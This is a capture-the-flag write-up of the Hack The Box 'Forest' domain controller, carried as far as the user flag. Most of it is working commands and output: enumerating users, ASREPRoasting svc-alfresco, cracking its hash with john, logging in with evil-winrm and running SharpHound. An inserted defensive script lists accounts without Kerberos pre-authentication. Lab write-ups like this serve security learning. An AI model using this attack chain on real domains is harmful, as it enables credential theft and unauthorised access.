Hack The Box Writeup: Forest (in progress, up to obtaining user.txt)
■Preparation
Log in to the HTB site and download the .ovpn file from there beforehand.
Connect over VPN:
$ sudo openvpn lab_xxxxx1.ovpn
(omitted)
2021-07-16 21:36:53 net_route_v4_add: 10.10.10.0/23 via 10.10.16.1 dev [NULL] table 0 metric -1
(omitted)
2021-07-16 22:01:20 Preserving previous TUN/TAP instance: tun0
2021-07-16 22:01:20 Initialization Sequence Completed
If it stops at "Initialization Sequence Completed", the connection is up.
Open another terminal and run the commands from there.
■Target
Forest
https://app.hackthebox.eu/machines/Forest
Reference
https://qiita.com/v_avenger/items/43014e5e34fe491764c8
■Information gathering (network)
$ nmap -sV -sT -sC 10.10.10.161
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-17 03:29 EDT
Nmap scan report for 10.10.10.161
Host is up (0.55s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Simple DNS Plus
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-17 07:49:25Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h39m08s, deviation: 4h02m32s, median: 19m06s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2021-07-17T00:49:50-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-07-17T07:49:48
|_  start_date: 2021-07-16T05:25:15

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.64 seconds
■Information gathering (users)
$ enum4linux 10.10.10.161
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jul 17 03:33:01 2021
(omitted)
=============================
|  Users on 10.10.10.161  |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x2137 RID: 0x463 acb: 0x00020015 Account: $331000-VK4ADACQNUCA Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator Name: Administrator Desc: Built-in account for administering the computer/domain
index: 0x2369 RID: 0x47e acb: 0x00000210 Account: andy Name: Andy Hislip Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x2352 RID: 0x478 acb: 0x00000210 Account: HealthMailbox0659cc1 Name: HealthMailbox-EXCH01-010 Desc: (null)
index: 0x234b RID: 0x471 acb: 0x00000210 Account: HealthMailbox670628e Name: HealthMailbox-EXCH01-003 Desc: (null)
index: 0x234d RID: 0x473 acb: 0x00000210 Account: HealthMailbox6ded678 Name: HealthMailbox-EXCH01-005 Desc: (null)
index: 0x2351 RID: 0x477 acb: 0x00000210 Account: HealthMailbox7108a4e Name: HealthMailbox-EXCH01-009 Desc: (null)
index: 0x234e RID: 0x474 acb: 0x00000210 Account: HealthMailbox83d6781 Name: HealthMailbox-EXCH01-006 Desc: (null)
index: 0x234c RID: 0x472 acb: 0x00000210 Account: HealthMailbox968e74d Name: HealthMailbox-EXCH01-004 Desc: (null)
index: 0x2350 RID: 0x476 acb: 0x00000210 Account: HealthMailboxb01ac64 Name: HealthMailbox-EXCH01-008 Desc: (null)
index: 0x234a RID: 0x470 acb: 0x00000210 Account: HealthMailboxc0a90c9 Name: HealthMailbox-EXCH01-002 Desc: (null)
index: 0x2348 RID: 0x46e acb: 0x00000210 Account: HealthMailboxc3d7722 Name: HealthMailbox-EXCH01-Mailbox-Database-1118319013 Desc: (null)
index: 0x2349 RID: 0x46f acb: 0x00000210 Account: HealthMailboxfc9daad Name: HealthMailbox-EXCH01-001 Desc: (null)
index: 0x234f RID: 0x475 acb: 0x00000210 Account: HealthMailboxfd87238 Name: HealthMailbox-EXCH01-007 Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x236a RID: 0x47f acb: 0x00000210 Account: mark Name: Mark Brandt Desc: (null)
index: 0x236b RID: 0x480 acb: 0x00000210 Account: santi Name: Santi Rodriguez Desc: (null)
index: 0x235c RID: 0x479 acb: 0x00000210 Account: sebastien Name: Sebastien Caron Desc: (null)
index: 0x215a RID: 0x468 acb: 0x00020011 Account: SM_1b41c9286325456bb Name: Microsoft Exchange Migration Desc: (null)
index: 0x2161 RID: 0x46c acb: 0x00020011 Account: SM_1ffab36a2f5f479cb Name: SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9} Desc: (null)
index: 0x2156 RID: 0x464 acb: 0x00020011 Account: SM_2c8eef0a09b545acb Name: Microsoft Exchange Approval Assistant Desc: (null)
index: 0x2159 RID: 0x467 acb: 0x00020011 Account: SM_681f53d4942840e18 Name: Discovery Search Mailbox Desc: (null)
index: 0x2158 RID: 0x466 acb: 0x00020011 Account: SM_75a538d3025e4db9a Name: Microsoft Exchange Desc: (null)
index: 0x215c RID: 0x46a acb: 0x00020011 Account: SM_7c96b981967141ebb Name: E4E Encryption Store - Active Desc: (null)
index: 0x215b RID: 0x469 acb: 0x00020011 Account: SM_9b69f1b9d2cc45549 Name: Microsoft Exchange Federation Mailbox Desc: (null)
index: 0x215d RID: 0x46b acb: 0x00020011 Account: SM_c75ee099d0a64c91b Name: Microsoft Exchange Desc: (null)
index: 0x2157 RID: 0x465 acb: 0x00020011 Account: SM_ca8c2ed5bdab4dc9b Name: Microsoft Exchange Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
=========================================
(omitted)
An ASREPRoast attack is reportedly effective here.
https://book.hacktricks.xyz/windows/active-directory-methodology/asreproast
ASREPRoast looks for user accounts for which Kerberos pre-authentication is not required (the DONT_REQ_PREAUTH flag). That means anyone can send an AS_REQ to the DC on behalf of those users and receive an AS_REP message, whose encrypted part can then be cracked offline.
Download the tool used for ASREPRoast (GetNPUsers.py):
$ wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetNPUsers.py
Trying to run it, but it fails because the module (impacket) is apparently missing:
$ python3 GetNPUsers.py --help
ModuleNotFoundError: No module named 'impacket.examples.utils'
$ pip --version
pip 20.3.4 from /usr/lib/python3/dist-packages/pip (python 3.9)
impacket appears to be installed, so uninstall it once
→ apparently there is nothing to remove. Is this environment OK?
$ pip uninstall impacket
Found existing installation: impacket 0.9.22
Not uninstalling impacket at /usr/lib/python3/dist-packages, outside environment /usr
Can't uninstall 'impacket'. No files were found to uninstall.
Download the required module (impacket):
$ git clone https://github.com/CoreSecurity/impacket.git
$ cd impacket
$ vi setup.py
(change the shebang line)
#!/usr/bin/env python
↓
#!/usr/bin/env python3
Install impacket:
$ sudo python3 setup.py install
$ python3 GetNPUsers.py --help
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] target
User names are required, so save the "Users on 10.10.10.161" section of the enum4linux output:
$ cat users_forest.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
:
Extract the user names using [ and ] as delimiters:
$ cat users_forest.txt | cut -d "[" -f 2 | cut -d "]" -f 1 > usernames_forest.txt
$ cat usernames_forest.txt
Administrator
Guest
:
Options used:
target: specify the domain name (Domain name: htb.local)
-usersfile: the list of user names
-format john: output in a format john can crack
-outputfile: file name to write the results to (any name will do)
$ python3 GetNPUsers.py HTB.local/ -usersfile usernames_forest.txt -format john -outputfile output_forest.txt -no-pass -dc-ip 10.10.10.161
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
(omitted)
[-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
It looked like a failure, but output_forest.txt does contain output:
$ cat output_forest.txt
$krb5asrep$svc-alfresco@HTB.LOCAL:d93839684eb654739ffa7(omitted)
The AS-REP hash of the user "svc-alfresco" was obtained; it is the one account for which pre-authentication is not required.
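The enum4linux listing above already showed which account would turn up here: the "acb:" column is the SAMR account-control bitfield, and svc-alfresco's value 0x00010210 includes bit 0x10000 (DONT_REQUIRE_PREAUTH), which is the misconfiguration a domain admin should remove. The following audit script is an added example (not from this writeup, impacket or enum4linux) that decodes those bits and lists accounts with pre-authentication disabled; the sample records are copied in the shape enum4linux prints them, and the flag values follow MS-SAMR 2.2.1.12.

```python
import re

# Subset of the SAMR USER_ACCOUNT control bits (MS-SAMR 2.2.1.12) as printed
# by enum4linux in the "acb:" column.
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000010: "NORMAL_ACCOUNT",
    0x00000200: "DONT_EXPIRE_PASSWORD",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PASSWORD_EXPIRED",
}
ACB_DONT_REQUIRE_PREAUTH = 0x00010000

# One enum4linux user record: "index: ... RID: ... acb: ... Account: ... Name: ...".
# Works whether the records are on separate lines or run together.
USER_RE = re.compile(
    r"index:\s*0x[0-9a-f]+\s+RID:\s*0x[0-9a-f]+\s+acb:\s*(0x[0-9a-f]+)\s+"
    r"Account:\s*(\S+)\s+Name:", re.IGNORECASE)


def parse_users(text):
    """Return (account, acb_value) tuples for every record in the text."""
    return [(m.group(2), int(m.group(1), 16)) for m in USER_RE.finditer(text)]


def decode_acb(acb):
    """Names of the known flag bits set in an acb value, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]


def preauth_disabled(text):
    """Accounts whose acb has DONT_REQUIRE_PREAUTH set (ASREPRoast exposure)."""
    return [acct for acct, acb in parse_users(text) if acb & ACB_DONT_REQUIRE_PREAUTH]


# Constructed sample in the enum4linux output format (values as on this page).
SAMPLE = """
index: 0xfbc RID: 0x1f4 acb: 0x00020010 Account: Administrator Name: Administrator Desc: Built-in account
index: 0xff4 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x2360 RID: 0x47a acb: 0x00000210 Account: lucinda Name: Lucinda Berger Desc: (null)
index: 0x2365 RID: 0x47b acb: 0x00010210 Account: svc-alfresco Name: svc-alfresco Desc: (null)
"""

if __name__ == "__main__":
    for acct, acb in parse_users(SAMPLE):
        print(f"{acct:16s} {acb:#010x} {', '.join(decode_acb(acb))}")
    print("pre-auth disabled:", preauth_disabled(SAMPLE))  # ['svc-alfresco']
```

Run it against the full "Users on" section saved from enum4linux to get the list of accounts that need pre-authentication re-enabled.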
Crack the hash with john (wordlist: rockyou.txt):
$ john output_forest.txt --wordlist=rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$svc-alfresco@HTB.LOCAL)
1g 0:00:00:03 DONE (2021-07-26 16:33) 0.2770g/s 1131Kp/s 1131Kc/s 1131KC/s s521379846..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The recovered password is "s3rvice".
Now that we have credentials, check whether WinRM is reachable:
$ nmap -p 5985 10.10.10.161
PORT     STATE SERVICE
5985/tcp open  wsman
Nmap done: 1 IP address (1 host up) scanned in 0.89 seconds
The port is open.
WS-Management (WSMan) is, roughly speaking, the protocol behind WinRM.
Client PC
  ↓ WS-MAN (HTTP)
Remote PC
  WinRM
  ↓
  PowerShell
Install the tool used for the connection:
$ sudo gem install winrm winrm-fs colorize stringio
$ git clone https://github.com/Hackplayers/evil-winrm.git
$ cd evil-winrm
Connect over WinRM:
$ ./evil-winrm.rb -i 10.10.10.161 -u svc-alfresco -p s3rvice
Evil-WinRM shell v3.0
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Display the flag:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type C:\Users\svc-alfresco\Desktop\user.txt
e5e*********************************ed
Got the first flag.
Next, analyse the Windows Active Directory environment with a tool called BloodHound.
It maps the relationships in the AD environment and should give clues toward reaching Domain Admins.
Download it locally:
$ cd evil-winrm
$ wget https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1
Upload it to the target machine and run it:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> upload SharpHound.ps1
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Import-module ./SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> Invoke-BloodHound -CollectionMethod ACL,ObjectProps,Default -NoSaveCache
Note: -CompressData -RemoveCSV produced an error, so those options were dropped.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir

    Directory: C:\Users\svc-alfresco\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/26/2021   1:44 AM          15361 20210726014448_BloodHound.zip   ★ result
-a----        7/26/2021   1:41 AM         974235 SharpHound.ps1
-ar---        9/23/2019   2:16 PM             32 user.txt
Download the result file:
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> download 20210726014448_BloodHound.zip
Info: Download successful!
It says "Download successful!", but for some reason nothing shows up locally...
Is this a bug in the tool?
Stopping here for now.